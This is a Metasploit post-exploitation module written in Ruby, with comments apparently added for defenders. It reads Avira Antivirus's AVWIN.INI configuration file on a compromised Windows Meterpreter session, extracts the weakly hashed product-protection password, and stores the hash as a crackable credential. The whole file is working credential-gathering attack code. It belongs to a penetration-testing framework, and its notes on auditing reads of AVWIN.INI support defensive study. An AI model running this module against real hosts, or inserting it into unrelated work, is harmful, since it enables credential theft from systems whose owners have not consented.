rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/avira_password.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
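# Post module that reads the Avira Antivirus configuration file on a Windows
# Meterpreter session and records the product-protection password hash it
# contains as a credential.
#
# Defender notes: per the module description the affected builds are
# <= 15.0.17.273, and the value is stored as MD5 over the Unicode password
# (the module reports "MD5(Unicode)" and tags it 'Raw-MD5u'), with the password
# length limited to 20 characters. Reads of AVWIN.INI by processes other than
# the Avira product itself are a reasonable thing to audit on hosts that still
# run such a build.
class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry

  # Registers the module metadata (name, description, platform, session type,
  # stability notes and the Meterpreter commands the module relies on).
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Avira Password Extraction',
        'Description' => %q{
          This module extracts the weakly hashed password
          which is used to protect a Avira Antivirus (<= 15.0.17.273) installation.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'Robert Kugler / robertchrk'],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        },
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              core_channel_eof
              core_channel_open
              core_channel_read
              core_channel_write
              stdapi_fs_stat
            ]
          }
        }
      )
    )
  end

  # Module entry point: checks the single hard-coded default location of the
  # Avira configuration file.
  def run
    path = 'C:\\ProgramData\\Avira\\Antivirus\\CONFIG\\AVWIN.INI'
    print_status("Checking default location (#{path}) ...")
    check_programdata(path)
  end

  # Confirms the file exists (stat raises when it does not) and hands it to
  # get_ini. Any failure is reported to the operator instead of aborting the
  # module; the underlying exception is shown only in verbose mode.
  #
  # @param path [String] remote path of the configuration file
  def check_programdata(path)
    client.fs.file.stat(path)
    print_status("Found file at #{path}")
    get_ini(path)
  rescue StandardError => e
    print_error("Error reading or processing #{path}.")
    # Keep the root cause available for troubleshooting without changing the
    # default output.
    vprint_error("#{e.class}: #{e.message}")
  end

  # Reads and parses the INI file, then stores the Password value of the
  # [COMMON] section as a non-replayable hash credential.
  #
  # @param filename [String] remote path of the configuration file
  # @return [void]
  def get_ini(filename)
    config = client.fs.file.new(filename, 'r')
    begin
      parse = Rex::Text.to_ascii(config.read)
    ensure
      # Always release the remote file handle, even when the read fails.
      config.close
    end
    ini = Rex::Parser::Ini.from_s(parse)

    if ini == {}
      print_error('Unable to parse file')
      return
    end

    print_status('Processing configuration file...')
    common = ini['COMMON']
    passwd = common && common['Password']
    # The value is written quoted in the file; strip the quotes before storing.
    passwd = passwd.delete('"') if passwd

    # A missing section/key or an empty value means there is nothing to record;
    # report that explicitly rather than failing on nil further down.
    if passwd.nil? || passwd.empty?
      print_error('No Password entry found in the COMMON section')
      return
    end

    create_credential({
      workspace_id: myworkspace_id,
      origin_type: :session,
      session_id: session_db_id,
      post_reference_name: refname,
      private_type: :nonreplayable_hash,
      jtr_format: 'Raw-MD5u', # hard-coded: automatic hash identification cannot tell the input was Unicode
      private_data: passwd,
      service_name: 'Avira Antivirus',
      status: Metasploit::Model::Login::Status::UNTRIED
    })
    # NOTE(review): the hash is echoed to the console, so it will also appear in
    # any session/console logs kept for the engagement.
    print_good("MD5(Unicode) hash found: #{passwd}")
    print_good('Info: Password length is limited to 20 characters.')
  end
end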